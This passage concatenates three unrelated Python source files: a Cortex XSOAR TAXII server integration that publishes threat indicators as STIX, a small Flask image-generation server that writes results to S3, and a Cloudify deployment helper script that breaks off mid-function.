NAMESPACE_URI = 'https://www.paloaltonetworks.com/cortex'
NAMESPACE = 'cortex'
''' Log Handler '''
class Handler:
@staticmethod
def write(message):
"""
Writes a log message to the Demisto server.
Args:
message: The log message to write
"""
demisto.info(message)
''' TAXII Server '''
class TAXIIServer:
def __init__(self, url_scheme: str, host: str, port: int, collections: dict, certificate: str, private_key: str,
http_server: bool, credentials: dict, service_address: Optional[str] = None):
"""
Class for a TAXII Server configuration.
Args:
url_scheme: The URL scheme (http / https)
host: The server address.
port: The server port.
collections: The JSON string of collections of indicator queries.
certificate: The server certificate for SSL.
private_key: The private key for SSL.
http_server: Whether to use HTTP server (not SSL).
credentials: The user credentials.
"""
self.url_scheme = url_scheme
self.host = host
self.port = port
self.collections = collections
self.certificate = certificate
self.private_key = private_key
self.http_server = http_server
self.service_address = service_address
self.auth = None
if credentials:
self.auth = (credentials.get('identifier', ''), credentials.get('password', ''))
self.service_instances = [
{
'type': SVC_DISCOVERY,
'path': 'taxii-discovery-service'
},
{
'type': SVC_COLLECTION_MANAGEMENT,
'path': 'taxii-collection-management-service'
},
{
'type': SVC_POLL,
'path': 'taxii-poll-service'
}
]
def get_discovery_service(self, taxii_message: DiscoveryRequest, request_headers: Headers) -> DiscoveryResponse:
"""
Handle discovery request.
Args:
taxii_message: The discovery request message.
request_headers: The request headers
Returns:
The discovery response.
"""
if taxii_message.message_type != MSG_DISCOVERY_REQUEST:
raise ValueError('Invalid message, invalid Message Type')
discovery_service_url = self.get_url(request_headers)
discovery_response = DiscoveryResponse(
generate_message_id(),
taxii_message.message_id
)
for instance in self.service_instances:
instance_type = instance['type']
instance_path = instance['path']
taxii_service_instance = ServiceInstance(
instance_type,
'urn:taxii.mitre.org:services:1.1',
'urn:taxii.mitre.org:protocol:http:1.0',
f'{discovery_service_url}/{instance_path}',
['urn:taxii.mitre.org:message:xml:1.1'],
available=True
)
discovery_response.service_instances.append(taxii_service_instance)
return discovery_response
def get_collections(self,
taxii_message: CollectionInformationRequest,
request_headers: Headers,
) -> CollectionInformationResponse:
"""
Handle collection management request.
Args:
taxii_message: The collection request message.
request_headers: The request headers
Returns:
The collection management response.
"""
taxii_feeds = list(self.collections.keys())
url = self.get_url(request_headers)
if taxii_message.message_type != MSG_COLLECTION_INFORMATION_REQUEST:
raise ValueError('Invalid message, invalid Message Type')
collection_info_response = CollectionInformationResponse(
generate_message_id(),
taxii_message.message_id
)
for feed in taxii_feeds:
collection_info = CollectionInformation(
feed,
f'{feed} Data Feed',
['urn:stix.mitre.org:xml:1.1.1'],
True
)
polling_instance = PollingServiceInstance(
'urn:taxii.mitre.org:protocol:http:1.0',
f'{url}/taxii-poll-service',
['urn:taxii.mitre.org:message:xml:1.1']
)
collection_info.polling_service_instances.append(polling_instance)
collection_info_response.collection_informations.append(collection_info)
return collection_info_response
def get_poll_response(self, taxii_message: PollRequest) -> Response:
"""
Handle poll request.
Args:
taxii_message: The poll request message.
Returns:
The poll response.
"""
if taxii_message.message_type != MSG_POLL_REQUEST:
raise ValueError('Invalid message, invalid Message Type')
taxii_feeds = list(self.collections.keys())
collection_name = taxii_message.collection_name
exclusive_begin_time = taxii_message.exclusive_begin_timestamp_label
inclusive_end_time = taxii_message.inclusive_end_timestamp_label
return self.stream_stix_data_feed(taxii_feeds, taxii_message.message_id, collection_name,
exclusive_begin_time, inclusive_end_time)
def stream_stix_data_feed(self, taxii_feeds: list, message_id: str, collection_name: str,
exclusive_begin_time: datetime, inclusive_end_time: datetime) -> Response:
"""
Get the indicator query results in STIX data feed format.
Args:
taxii_feeds: The available taxii feeds according to the collections.
message_id: The taxii message ID.
collection_name: The collection name to get the indicator query from.
exclusive_begin_time: The query exclusive begin time.
inclusive_end_time: The query inclusive end time.
Returns:
Stream of STIX indicator data feed.
"""
if collection_name not in taxii_feeds:
raise ValueError('Invalid message, unknown feed')
if not inclusive_end_time:
inclusive_end_time = datetime.utcnow().replace(tzinfo=pytz.utc)
def yield_response() -> Generator:
"""
Streams the STIX indicators as XML string.
"""
# yield the opening tag of the Poll Response
response = '<taxii_11:Poll_Response xmlns:taxii="http://taxii.mitre.org/messages/taxii_xml_binding-1"' \
' xmlns:taxii_11="http://taxii.mitre.org/messages/taxii_xml_binding-1.1" ' \
'xmlns:tdq="http://taxii.mitre.org/query/taxii_default_query-1"' \
f' message_id="{generate_message_id()}"' \
f' in_response_to="{message_id}"' \
f' collection_name="{collection_name}" more="false" result_part_number="1"> ' \
f'<taxii_11:Inclusive_End_Timestamp>{inclusive_end_time.isoformat()}' \
'</taxii_11:Inclusive_End_Timestamp>'
if exclusive_begin_time is not None:
response += (f'<taxii_11:Exclusive_Begin_Timestamp>{exclusive_begin_time.isoformat()}'
f'</taxii_11:Exclusive_Begin_Timestamp>')
yield response
# yield the content blocks
indicator_query = self.collections[str(collection_name)]
for indicator in find_indicators_by_time_frame(indicator_query, exclusive_begin_time, inclusive_end_time):
try:
stix_xml_indicator = get_stix_indicator(indicator).to_xml(ns_dict={NAMESPACE_URI: NAMESPACE})
content_block = ContentBlock(
content_binding=CB_STIX_XML_11,
content=stix_xml_indicator
)
content_xml = content_block.to_xml().decode('utf-8')
yield f'{content_xml}\n'
except Exception as e:
handle_long_running_error(f'Failed parsing indicator to STIX: {e}')
# yield the closing tag
yield '</taxii_11:Poll_Response>'
return Response(
response=stream_with_context(yield_response()),
status=200,
headers={
'X-TAXII-Content-Type': 'urn:taxii.mitre.org:message:xml:1.1',
'X-TAXII-Protocol': 'urn:taxii.mitre.org:protocol:http:1.0'
},
mimetype='application/xml'
)
def get_url(self, request_headers: Headers) -> str:
"""
Args:
request_headers: The request headers
Returns:
The service URL according to the protocol.
"""
if self.service_address:
return self.service_address
if request_headers and '/instance/execute' in request_headers.get('X-Request-URI', ''):
# if the server rerouting is used, then the X-Request-URI header is added to the request by the server
# and we should use the /instance/execute endpoint in the address
self.url_scheme = 'https'
calling_context = get_calling_context()
instance_name = calling_context.get('IntegrationInstance', '')
endpoint = requote_uri(os.path.join('/instance', 'execute', instance_name))
else:
endpoint = f':{self.port}'
return f'{self.url_scheme}://{self.host}{endpoint}'
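# Illustrative shapes of the returned address (host and instance names are hypothetical):
#   rerouted through the server:  https://my.xsoar.host/instance/execute/taxii_instance_1
#   direct port mapping:          http://my.xsoar.host:9000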
SERVER: TAXIIServer
DEMISTO_LOGGER: Handler = Handler()
''' STIX MAPPING '''
def create_stix_ip_observable(namespace: str, indicator: dict) -> List[Observable]:
"""
Create STIX IP observable.
Args:
namespace: The XML namespace.
indicator: The Demisto IP indicator.
Returns:
STIX IP observable.
"""
category = cybox.objects.address_object.Address.CAT_IPV4
type_ = indicator.get('indicator_type', '')
value = indicator.get('value', '')
if type_ in [FeedIndicatorType.IPv6, FeedIndicatorType.IPv6CIDR]:
category = cybox.objects.address_object.Address.CAT_IPV6
indicator_values = [value]
if '-' in value:
# looks like an IP Range, let's try to make it a CIDR
a1, a2 = value.split('-', 1)
if a1 == a2:
# same IP
indicator_values = [a1]
else:
# use netaddr builtin algo to summarize range into CIDR
iprange = netaddr.IPRange(a1, a2)
cidrs = iprange.cidrs()
indicator_values = list(map(str, cidrs))
observables = []
for indicator_value in indicator_values:
id_ = f'{namespace}:observable-{uuid.uuid4()}'
address_object = cybox.objects.address_object.Address(
address_value=indicator_value,
category=category
)
observable = Observable(
title=f'{type_}: {indicator_value}',
id_=id_,
item=address_object
)
observables.append(observable)
return observables
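# Note: an IP range is summarized into CIDRs with netaddr, so one Demisto indicator can yield
# several observables. Illustrative example (values are hypothetical):
#   '192.168.0.1-192.168.0.4' -> observables for 192.168.0.1/32, 192.168.0.2/31, 192.168.0.4/32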
def create_stix_email_observable(namespace: str, indicator: dict) -> List[Observable]:
"""
Create STIX Email observable.
Args:
namespace: The XML namespace.
indicator: The Demisto Email indicator.
Returns:
STIX Email observable.
"""
category = cybox.objects.address_object.Address.CAT_EMAIL
type_ = indicator.get('indicator_type', '')
value = indicator.get('value', '')
id_ = f'{namespace}:observable-{uuid.uuid4()}'
email_object = cybox.objects.address_object.Address(
address_value=indicator.get('value', ''),
category=category
)
observable = Observable(
title=f'{type_}: {value}',
id_=id_,
item=email_object
)
return [observable]
def create_stix_domain_observable(namespace, indicator):
"""
Create STIX Domain observable.
Args:
namespace: The XML namespace.
indicator: The Demisto Domain indicator.
Returns:
STIX Domain observable.
"""
id_ = f'{namespace}:observable-{uuid.uuid4()}'
value = indicator.get('value', '')
domain_object = cybox.objects.domain_name_object.DomainName()
domain_object.value = value
domain_object.type_ = 'FQDN'
observable = Observable(
title=f'FQDN: {value}',
id_=id_,
item=domain_object
)
return [observable]
def create_stix_url_observable(namespace, indicator):
"""
Create STIX URL observable.
Args:
namespace: The XML namespace.
indicator: The Demisto URL indicator.
Returns:
STIX URL observable.
"""
id_ = f'{namespace}:observable-{uuid.uuid4()}'
value = indicator.get('value', '')
uri_object = cybox.objects.uri_object.URI(
value=value,
type_=cybox.objects.uri_object.URI.TYPE_URL
)
observable = Observable(
title=f'URL: {value}',
id_=id_,
item=uri_object
)
return [observable]
def create_stix_hash_observable(namespace, indicator):
"""
Create STIX file observable.
Args:
namespace: The XML namespace.
indicator: The Demisto File indicator.
Returns:
STIX File observable.
"""
id_ = f'{namespace}:observable-{uuid.uuid4()}'
value = indicator.get('value', '')
type_ = indicator.get('indicator_type', '')
file_object = cybox.objects.file_object.File()
file_object.add_hash(indicator)
observable = Observable(
title=f'{value}: {type_}',
id_=id_,
item=file_object
)
return [observable]
TYPE_MAPPING = {
FeedIndicatorType.IP: {
'indicator_type': stix.common.vocabs.IndicatorType.TERM_IP_WATCHLIST,
'mapper': create_stix_ip_observable
},
FeedIndicatorType.CIDR: {
'indicator_type': stix.common.vocabs.IndicatorType.TERM_IP_WATCHLIST,
'mapper': create_stix_ip_observable
},
FeedIndicatorType.IPv6: {
'indicator_type': stix.common.vocabs.IndicatorType.TERM_IP_WATCHLIST,
'mapper': create_stix_ip_observable
},
FeedIndicatorType.IPv6CIDR: {
'indicator_type': stix.common.vocabs.IndicatorType.TERM_IP_WATCHLIST,
'mapper': create_stix_ip_observable
},
FeedIndicatorType.URL: {
'indicator_type': stix.common.vocabs.IndicatorType.TERM_URL_WATCHLIST,
'mapper': create_stix_url_observable
},
FeedIndicatorType.Domain: {
'indicator_type': stix.common.vocabs.IndicatorType.TERM_DOMAIN_WATCHLIST,
'mapper': create_stix_domain_observable
},
FeedIndicatorType.File: {
'indicator_type': stix.common.vocabs.IndicatorType.TERM_FILE_HASH_WATCHLIST,
'mapper': create_stix_hash_observable
},
FeedIndicatorType.Email: {
'indicator_type': stix.common.vocabs.IndicatorType.TERM_MALICIOUS_EMAIL,
'mapper': create_stix_email_observable
}
}
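# TYPE_MAPPING drives get_stix_indicator(): the Demisto indicator type selects both the STIX
# indicator type vocabulary term and the observable builder. Minimal dispatch sketch
# (the indicator dict below is illustrative only):
#   mapper = TYPE_MAPPING[FeedIndicatorType.Domain]
#   observables = mapper['mapper'](NAMESPACE, {'indicator_type': 'Domain', 'value': 'example.com'})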
def set_id_namespace(uri: str, name: str):
"""
Set the XML namespace.
Args:
uri: The namespace URI.
name: The namespace name.
"""
namespace = mixbox.namespaces.Namespace(uri, name)
mixbox.idgen.set_id_namespace(namespace)
def get_stix_indicator(indicator: dict) -> stix.core.STIXPackage:
"""
Convert a Demisto indicator to STIX.
Args:
indicator: The Demisto indicator.
Returns:
The STIX package (stix.core.STIXPackage) built for the indicator.
"""
set_id_namespace(NAMESPACE_URI, NAMESPACE)
type_ = indicator.get('indicator_type', '')
type_mapper: dict = TYPE_MAPPING.get(type_, {})
value = indicator.get('value', '')
source = indicator.get('sourceBrands', [])
sources = ','.join(source)
handling = None
# Add TLP if available
share_level = indicator.get('trafficlightprotocol', '').upper()
if share_level and share_level in ['WHITE', 'GREEN', 'AMBER', 'RED']:
marking_specification = stix.data_marking.MarkingSpecification()
marking_specification.controlled_structure = "//node() | //@*"
tlp = stix.extensions.marking.tlp.TLPMarkingStructure()
tlp.color = share_level
marking_specification.marking_structures.append(tlp)
handling = stix.data_marking.Marking()
handling.add_marking(marking_specification)
header = None
if handling is not None:
header = stix.core.STIXHeader(
handling=handling
)
# Create the STIX package
package_id = f'{NAMESPACE}:observable-{uuid.uuid4()}'
stix_package = stix.core.STIXPackage(id_=package_id, stix_header=header)
# Get the STIX observables according to the indicator mapper
observables = type_mapper['mapper'](NAMESPACE, indicator)
# Create the STIX indicator
for observable in observables:
id_ = f'{NAMESPACE}:indicator-{uuid.uuid4()}'
if type_ == 'URL':
indicator_value = werkzeug.urls.iri_to_uri(value, safe_conversion=True)
else:
indicator_value = value
stix_indicator = stix.indicator.indicator.Indicator(
id_=id_,
title=f'{type_}: {indicator_value}',
description=f'{type_} indicator from {sources}',
timestamp=datetime.utcnow().replace(tzinfo=pytz.utc)
)
# Confidence is mapped by the indicator score
confidence = 'Low'
indicator_score = indicator.get('score')
if indicator_score is None:
demisto.error(f'indicator without score: {value}')
stix_indicator.confidence = "Unknown"
else:
score = int(indicator.get('score', 0))
if score < 2:
pass
elif score < 3:
confidence = 'Medium'
else:
confidence = 'High'
stix_indicator.confidence = confidence
stix_indicator.add_indicator_type(type_mapper['indicator_type'])
stix_indicator.add_observable(observable)
stix_package.add_indicator(stix_indicator)
return stix_package
''' HELPER FUNCTIONS '''
def get_calling_context():
return demisto.callingContext.get('context', {}) # type: ignore[attr-defined]
def handle_long_running_error(error: str):
"""
Handle errors in the long running process.
Args:
error: The error message.
"""
demisto.error(error)
demisto.updateModuleHealth(error)
def validate_credentials(f: Callable) -> Callable:
"""
Wrapper function of HTTP requests to validate authentication headers.
Args:
f: The wrapped function.
Returns:
The function result (if the authentication is valid).
"""
@functools.wraps(f)
def validate(*args, **kwargs):
headers = request.headers
if SERVER.auth:
credentials: str = headers.get('Authorization', '')
if not credentials or 'Basic ' not in credentials:
return make_response('Invalid authentication', 401)
encoded_credentials: str = credentials.split('Basic ')[1]
credentials: str = b64decode(encoded_credentials).decode('utf-8')
if ':' not in credentials:
return make_response('Invalid authentication', 401)
credentials_list = credentials.split(':')
if len(credentials_list) != 2:
return make_response('Invalid authentication', 401)
username, password = credentials_list
if not (username == SERVER.auth[0] and password == SERVER.auth[1]):
return make_response('Invalid authentication', 401)
return f(*args, **kwargs)
return validate
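# Expected header when credentials are configured (user/password below are hypothetical):
#   Authorization: Basic base64("user:password")  ->  Authorization: Basic dXNlcjpwYXNzd29yZA==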
def taxii_check(f: Callable) -> Callable:
"""
Wrapper function of HTTP requests to validate taxii headers.
Args:
f: The wrapped function.
Returns:
The function result (if the headers are valid).
"""
@functools.wraps(f)
def check(*args, **kwargs):
taxii_content_type = request.headers.get('X-TAXII-Content-Type', None)
if taxii_content_type not in ['urn:taxii.mitre.org:message:xml:1.1', 'urn:taxii.mitre.org:message:xml:1.0']:
return make_response('Invalid TAXII Headers', 400)
taxii_protocol = request.headers.get('X-TAXII-Protocol', None)
if taxii_protocol not in ['urn:taxii.mitre.org:protocol:http:1.0',
'urn:taxii.mitre.org:protocol:https:1.0']:
return make_response('Invalid TAXII Headers', 400)
taxii_services = request.headers.get('X-TAXII-Services', None)
if taxii_services not in ['urn:taxii.mitre.org:services:1.1', 'urn:taxii.mitre.org:services:1.0']:
return make_response('Invalid TAXII Headers', 400)
return f(*args, **kwargs)
return check
def get_port(params: dict = demisto.params()) -> int:
"""
Gets port from the integration parameters.
"""
port_mapping: str = params.get('longRunningPort', '')
port: int
if port_mapping:
if ':' in port_mapping:
port = int(port_mapping.split(':')[1])
else:
port = int(port_mapping)
else:
raise ValueError('Please provide a Listen Port.')
return port
def get_collections(params: dict = demisto.params()) -> dict:
"""
Gets the indicator query collections from the integration parameters.
"""
collections_json: str = params.get('collections', '')
try:
collections = json.loads(collections_json)
except Exception:
raise ValueError('The collections string must be a valid JSON object.')
return collections
def find_indicators_by_time_frame(indicator_query: str, begin_time: datetime, end_time: datetime) -> list:
"""
Find indicators according to a query and begin time/end time.
Args:
indicator_query: The indicator query.
begin_time: The exclusive begin time.
end_time: The inclusive end time.
Returns:
Indicator query results from Demisto.
"""
if indicator_query:
indicator_query += ' and '
else:
indicator_query = ''
if begin_time:
tz_begin_time = datetime.strftime(begin_time, '%Y-%m-%dT%H:%M:%S %z')
indicator_query += f'sourcetimestamp:>"{tz_begin_time}"'
if end_time:
indicator_query += ' and '
if end_time:
tz_end_time = datetime.strftime(end_time, '%Y-%m-%dT%H:%M:%S %z')
indicator_query += f'sourcetimestamp:<="{tz_end_time}"'
demisto.info(f'Querying indicators by: {indicator_query}')
return find_indicators_loop(indicator_query)
def find_indicators_loop(indicator_query: str):
"""
Find indicators in a loop according to a query.
Args:
indicator_query: The indicator query.
Returns:
Indicator query results from Demisto.
"""
iocs: List[dict] = []
total_fetched = 0
last_found_len = PAGE_SIZE
search_indicators = IndicatorsSearcher()
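# Page through the search: keep fetching while each page comes back full (PAGE_SIZE results);
# a short page indicates the final batch has been reached.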
while last_found_len == PAGE_SIZE:
fetched_iocs = search_indicators.search_indicators_by_version(query=indicator_query, size=PAGE_SIZE).get('iocs')
iocs.extend(fetched_iocs)
last_found_len = len(fetched_iocs)
total_fetched += last_found_len
return iocs
def taxii_make_response(taxii_message: TAXIIMessage):
"""
Create an HTTP taxii response from a taxii message.
Args:
taxii_message: The taxii message.
Returns:
A taxii HTTP response.
"""
headers = {
'Content-Type': "application/xml",
'X-TAXII-Content-Type': 'urn:taxii.mitre.org:message:xml:1.1',
'X-TAXII-Protocol': 'urn:taxii.mitre.org:protocol:http:1.0'
}
response = make_response((taxii_message.to_xml(pretty_print=True), 200, headers))
return response
''' ROUTE FUNCTIONS '''
@APP.route('/taxii-discovery-service', methods=['POST'])
@taxii_check
@validate_credentials
def taxii_discovery_service() -> Response:
"""
Route for discovery service.
"""
try:
discovery_response = SERVER.get_discovery_service(get_message_from_xml(request.data), request.headers)
except Exception as e:
error = f'Could not perform the discovery request: {str(e)}'
handle_long_running_error(error)
return make_response(error, 400)
return taxii_make_response(discovery_response)
@APP.route('/taxii-collection-management-service', methods=['POST'])
@taxii_check
@validate_credentials
def taxii_collection_management_service() -> Response:
"""
Route for collection management.
"""
try:
collection_response = SERVER.get_collections(get_message_from_xml(request.data), request.headers)
except Exception as e:
error = f'Could not perform the collection management request: {str(e)}'
handle_long_running_error(error)
return make_response(error, 400)
return taxii_make_response(collection_response)
@APP.route('/taxii-poll-service', methods=['POST'])
@taxii_check
@validate_credentials
def taxii_poll_service() -> Response:
"""
Route for poll service.
"""
try:
taxiicontent_type = request.headers['X-TAXII-Content-Type']
if taxiicontent_type == 'urn:taxii.mitre.org:message:xml:1.1':
taxii_message = get_message_from_xml(request.data)
else:
raise ValueError('Invalid message')
except Exception as e:
error = f'Could not perform the polling request: {str(e)}'
handle_long_running_error(error)
return make_response(error, 400)
return SERVER.get_poll_response(taxii_message)
''' COMMAND FUNCTIONS '''
def test_module(taxii_server: TAXIIServer):
run_server(taxii_server, is_test=True)
return 'ok', {}, {}
def run_server(taxii_server: TAXIIServer, is_test=False):
"""
Start the taxii server.
"""
certificate_path = str()
private_key_path = str()
ssl_args = dict()
try:
if taxii_server.certificate and taxii_server.private_key and not taxii_server.http_server:
certificate_file = NamedTemporaryFile(delete=False)
certificate_path = certificate_file.name
certificate_file.write(bytes(taxii_server.certificate, 'utf-8'))
certificate_file.close()
private_key_file = NamedTemporaryFile(delete=False)
private_key_path = private_key_file.name
private_key_file.write(bytes(taxii_server.private_key, 'utf-8'))
private_key_file.close()
context = SSLContext(PROTOCOL_TLSv1_2)
context.load_cert_chain(certificate_path, private_key_path)
ssl_args['ssl_context'] = context
demisto.debug('Starting HTTPS Server')
else:
demisto.debug('Starting HTTP Server')
wsgi_server = WSGIServer(('0.0.0.0', taxii_server.port), APP, **ssl_args, log=DEMISTO_LOGGER)
if is_test:
server_process = Process(target=wsgi_server.serve_forever)
server_process.start()
time.sleep(5)
server_process.terminate()
else:
demisto.updateModuleHealth('')
wsgi_server.serve_forever()
except SSLError as e:
ssl_err_message = f'Failed to validate certificate and/or private key: {str(e)}'
handle_long_running_error(ssl_err_message)
raise ValueError(ssl_err_message)
except Exception as e:
handle_long_running_error(f'An error occurred: {str(e)}')
raise ValueError(str(e))
finally:
if certificate_path:
os.unlink(certificate_path)
if private_key_path:
os.unlink(private_key_path)
def main():
"""
Main
"""
params = demisto.params()
command = demisto.command()
port = get_port(params)
collections = get_collections(params)
server_links = demisto.demistoUrls()
server_link_parts: ParseResult = urlparse(server_links.get('server'))
certificate: str = params.get('certificate', '')
private_key: str = params.get('key', '')
credentials: dict = params.get('credentials', None)
http_server = True
if (certificate and not private_key) or (private_key and not certificate):
raise ValueError('When using HTTPS connection, both certificate and private key must be provided.')
elif certificate and private_key:
http_server = False
global SERVER
scheme = 'http'
host_name = server_link_parts.hostname
if not http_server:
scheme = 'https'
service_address = params.get('service_address')
SERVER = TAXIIServer(scheme, str(host_name), port, collections,
certificate, private_key, http_server, credentials, service_address)
demisto.debug(f'Command being called is {command}')
commands = {
'test-module': test_module
}
try:
if command == 'long-running-execution':
run_server(SERVER)
else:
readable_output, outputs, raw_response = commands[command](SERVER)
return_outputs(readable_output, outputs, raw_response)
except Exception as e:
err_msg = f'Error in {INTEGRATION_NAME} Integration [{e}]'
return_error(err_msg)
if __name__ in ['__main__', '__builtin__', 'builtins']:
main()
|
server.py
|
# This standalone server is adapted from the worker code,
# but is meant to work in a standalone fashion without the
# need for a central server. Results are written to s3.
# testing with curl
# curl -H "Content-Type: application/json" -d '{"id": "asdf", "text_prompt": "A cute cartoon frog", "iterations": 100}' http://localhost:5000/image
import requests
import sys
import os
from types import SimpleNamespace
import time
import json
from api_client import AIBrushAPI
import base64
import traceback
import flask
import boto3
import threading
BUCKET = "aibrush-test"
from vqgan_clip.generate import run, default_args
def cleanup():
# delete all files in the current folder ending in .png
for fname in os.listdir("."):
if fname.endswith(".png"):
os.remove(fname)
# flask api
app = flask.Flask(__name__)
# create image endpoint
@app.route('/image', methods=['POST'])
def create_image():
# get payload
payload = flask.request.get_json()
t = threading.Thread(target=handle_create, args=(payload,))
t.start()
return "OK"
def handle_create(payload):
args = SimpleNamespace(**default_args().__dict__)
# get image id
image_id = payload["id"]
# get image data
image_data = None
if "image_data" in payload:
image_data = payload["image_data"]
# decode image data
image_data = base64.decodebytes(image_data.encode("utf-8"))
with open(f"{image_id}-init.png", "wb") as f:
f.write(image_data)
args.init_image = f"{image_id}-init.png"
# get text prompt
args.prompts = payload["text_prompt"]
# get iterations
iterations = payload["iterations"]
args.max_iterations = iterations
args.output = f"{image_id}.png"
run(args)
# get output image
with open(f"{image_id}.png", "rb") as f:
image_data = f.read()
# write image data to s3
s3 = boto3.resource('s3')
s3.Bucket(BUCKET).put_object(Key=f"{image_id}.png", Body=image_data)
cleanup()
# start flask server
if __name__ == '__main__':
app.run(host="0.0.0.0", port=5000)
|
_a4c_post_configure_source.py
|
from cloudify import ctx
from cloudify.exceptions import NonRecoverableError
from cloudify.state import ctx_parameters as inputs
import subprocess
import os
import re
import sys
import time
import threading
import platform
from StringIO import StringIO
from cloudify_rest_client import CloudifyClient
from cloudify import utils
if 'MANAGER_REST_PROTOCOL' in os.environ and os.environ['MANAGER_REST_PROTOCOL'] == "https":
client = CloudifyClient(host=utils.get_manager_ip(), port=utils.get_manager_rest_service_port(), protocol='https', trust_all=True)
else:
client = CloudifyClient(host=utils.get_manager_ip(), port=utils.get_manager_rest_service_port())
def convert_env_value_to_string(envDict):
for key, value in envDict.items():
envDict[str(key)] = str(envDict.pop(key))
def get_attribute_user(ctx):
if get_attribute(ctx, 'user'):
return get_attribute(ctx, 'user')
else:
return get_attribute(ctx, 'cloudify_agent')['user']
def get_attribute_key(ctx):
if get_attribute(ctx, 'key'):
return get_attribute(ctx, 'key')
else:
return get_attribute(ctx, 'cloudify_agent')['key']
def get_host(entity):
if entity.instance.relationships:
for relationship in entity.instance.relationships:
if 'cloudify.relationships.contained_in' in relationship.type_hierarchy:
return relationship.target
return None
def has_attribute_mapping(entity, attribute_name):
ctx.logger.info('Check if a mapping exists for attribute {0} in {1}'.format(attribute_name, entity.node.properties))
mapping_configuration = entity.node.properties.get('_a4c_att_' + attribute_name, None)
if mapping_configuration is not None:
if mapping_configuration['parameters'][0] == 'SELF' and mapping_configuration['parameters'][1] == attribute_name:
return False
else:
return True
return False
def process_attribute_mapping(entity, attribute_name, data_retriever_function):
# This is where attribute mapping is defined in the cloudify type
mapping_configuration = entity.node.properties['_a4c_att_' + attribute_name]
ctx.logger.info('Mapping configuration found for attribute {0} is {1}'.format(attribute_name, mapping_configuration))
# If the mapping configuration exists and it concerns SELF, just get the attribute of the mapped attribute name.
# Else if it concerns TARGET, follow the relationship and retrieve the mapped attribute name from the TARGET.
if mapping_configuration['parameters'][0] == 'SELF':
return data_retriever_function(entity, mapping_configuration['parameters'][1])
elif mapping_configuration['parameters'][0] == 'TARGET' and entity.instance.relationships:
for relationship in entity.instance.relationships:
if mapping_configuration['parameters'][1] in relationship.type_hierarchy:
return data_retriever_function(relationship.target, mapping_configuration['parameters'][2])
return ""
def get_nested_attribute(entity, attribute_names):
deep_properties = get_attribute(entity, attribute_names[0])
attribute_names_iter = iter(attribute_names)
next(attribute_names_iter)
for attribute_name in attribute_names_iter:
if deep_properties is None:
return ""
else:
deep_properties = deep_properties.get(attribute_name, None)
return deep_properties
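# Illustrative call (attribute names are hypothetical): get_nested_attribute(entity, ['cloudify_agent', 'user'])
# resolves the 'cloudify_agent' attribute first, then returns its nested 'user' entry, or "" if a level is missing.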
def _all_instances_get_nested_attribute(entity, attribute_names):
return None
def get_attribute(entity, attribute_name):
if has_attribute_mapping(entity, attribute_name):
# First check if any mapping exists for the attribute
mapped_value = process_attribute_mapping(entity, attribute_name, get_attribute)
ctx.logger.info('Mapping exists for attribute {0} with value {1}'.format(attribute_name, mapped_value))
return mapped_value
# No mapping exists, try to get the attribute directly from the entity
attribute_value = entity.instance.runtime_properties.get(attribute_name, None)
if attribute_value is not None:
ctx.logger.info('Found the attribute {0} with value {1} on the node {2}'.format(attribute_name, attribute_value, entity.node.id))
return attribute_value
# Attribute retrieval fails, fall back to property
property_value = entity.node.properties.get(attribute_name, None)
if property_value is not None:
return property_value
# Property retrieval fails, fall back to host instance
host = get_host(entity)
if host is not None:
ctx.logger.info('Attribute {0} not found, going up to the parent node {1}'.format(attribute_name, host.node.id))
return get_attribute(host, attribute_name)
# Nothing is found
return ""
def _all_instances_get_attribute(entity, attribute_name):
result_map = {}
# get all instances data using cfy rest client
# we have to get the node using the rest client with node_instance.node_id
# then we will have the relationships
node = client.nodes.get(ctx.deployment.id, entity.node.id)
all_node_instances = client.node_instances.list(ctx.deployment.id, entity.node.id)
for node_instance in all_node_instances:
prop_value = __recursively_get_instance_data(node, node_instance, attribute_name)
if prop_value is not None:
ctx.logger.info('Found the property/attribute {0} with value {1} on the node {2} instance {3}'.format(attribute_name, prop_value, entity.node.id,
node_instance.id))
result_map[node_instance.id + '_'] = prop_value
return result_map
def get_property(entity, property_name):
# Try to get the property value on the node
property_value = entity.node.properties.get(property_name, None)
if property_value is not None:
ctx.logger.info('Found the property {0} with value {1} on the node {2}'.format(property_name, property_value, entity.node.id))
return property_value
# No property found on the node, fall back to the host
host = get_host(entity)
if host is not None:
ctx.logger.info('Property {0} not found, going up to the parent node {1}'.format(property_name, host.node.id))
return get_property(host, property_name)
return ""
def get_instance_list(node_id):
result = ''
all_node_instances = client.node_instances.list(ctx.deployment.id, node_id)
for node_instance in all_node_instances:
if len(result) > 0:
result += ','
result += node_instance.id
return result
def get_host_node_name(instance):
for relationship in instance.relationships:
if 'cloudify.relationships.contained_in' in relationship.type_hierarchy:
return relationship.target.node.id
return None
def __get_relationship(node, target_name, relationship_type):
for relationship in node.relationships:
if relationship.get('target_id') == target_name and relationship_type in relationship.get('type_hierarchy'):
return relationship
return None
def __has_attribute_mapping(node, attribute_name):
ctx.logger.info('Check if a mapping exists for attribute {0} in {1}'.format(attribute_name, node.properties))
mapping_configuration = node.properties.get('_a4c_att_' + attribute_name, None)
if mapping_configuration is not None:
if mapping_configuration['parameters'][0] == 'SELF' and mapping_configuration['parameters'][1] == attribute_name:
return False
else:
return True
return False
def __process_attribute_mapping(node, node_instance, attribute_name, data_retriever_function):
# This is where attribute mapping is defined in the cloudify type
mapping_configuration = node.properties['_a4c_att_' + attribute_name]
ctx.logger.info('Mapping configuration found for attribute {0} is {1}'.format(attribute_name, mapping_configuration))
# If the mapping configuration exists and it concerns SELF, just get the attribute of the mapped attribute name.
# Else if it concerns TARGET, follow the relationship and retrieve the mapped attribute name from the TARGET.
if mapping_configuration['parameters'][0] == 'SELF':
return data_retriever_function(node, node_instance, mapping_configuration['parameters'][1])
elif mapping_configuration['parameters'][0] == 'TARGET' and node_instance.relationships:
for rel in node_instance.relationships:
relationship = __get_relationship(node, rel.get('target_name'), rel.get('type'))
if mapping_configuration['parameters'][1] in relationship.get('type_hierarchy'):
target_instance = client.node_instances.get(rel.get('target_id'))
target_node = client.nodes.get(ctx.deployment.id, target_instance.node_id)
return data_retriever_function(target_node, target_instance, mapping_configuration['parameters'][2])
return None
def __recursively_get_instance_data(node, node_instance, attribute_name):
if __has_attribute_mapping(node, attribute_name):
return __process_attribute_mapping(node, node_instance, attribute_name, __recursively_get_instance_data)
attribute_value = node_instance.runtime_properties.get(attribute_name, None)
if attribute_value is not None:
return attribute_value
elif node_instance.relationships:
for rel in node_instance.relationships:
# on rel we have target_name, target_id (instanceId), type
relationship = __get_relationship(node, rel.get('target_name'), rel.get('type'))
if 'cloudify.relationships.contained_in' in relationship.get('type_hierarchy'):
